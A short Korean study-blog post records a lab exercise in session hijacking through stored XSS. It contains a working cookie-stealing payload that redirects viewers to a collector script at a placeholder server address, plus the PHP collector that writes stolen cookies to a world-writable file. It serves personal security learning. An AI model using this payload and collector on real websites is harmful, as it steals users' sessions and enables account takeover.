Today I Learned …
[해킹] Stored XSS를 이용한 세션 탈취 실습 본문
* 개인적인 공부 내용을 기록한 글입니다.
사담
자투리 시간에 잠시 실습
설명
Stored XSS를 이용한 세션 탈취의 가장 기본적인 예시를 실습한다.
Stored XSS를 이용한 세션 탈취 맛보기
세션 탈취 절차
[1] alert(1)로 취약점 확인
[2] Stored XSS 게시글 작성
[2] 사용자가 게시글 조회 시 xss.php에 document.cookie 값 보내주기
[3] 넘겨받아서 xss.txt에 적어줌
[4] xss.txt 확인
세션 탈취 실습
[1] <script>alert(1)</script> 게시글 작성
[2] 게시글 조회 시 alert 출력됨 → 취약점 O
[3] xss.php 작성
<?php
$cookie=$_GET['cookie'];
$save_file=fopen("/var/www/html/study/hack/xss.txt","w");
fwrite($save_file,$cookie);
fclose($save_file);
?>
[4] xss.txt에 쓰기 권한 주기
⇒ chmod 777 xss.txt
[5] 세션 탈취 위한 게시글 작성 (Stored XSS)
⇒ <script>document.location="[서버주소]/study/hack/xss.php?cookie="+document.cookie;</script>
[6] 해당 게시글 조회 (xss.php로 바로 리디렉션되기 때문에 빈 화면 뜸)
[7] xss.txt 확인
⇒ 세션 탈취 성공!
참고 포스팅
'Study > 해킹' 카테고리의 다른 글
| [해킹] E2E 개념 및 파라미터 암호화 우회 (0) | 2022.01.01 |
|---|---|
| [해킹] Burp Suite 기능 정리 (0) | 2021.11.21 |
| [해킹] XSS (Cross-Site Scripting) (0) | 2021.11.20 |
| [해킹] Blind SQL Injection (0) | 2021.11.08 |
| [해킹] SQL Injection : 개념 및 공격 기법 (2) | 2021.10.17 |
berry
FE Developer, loves React & better DX
Comments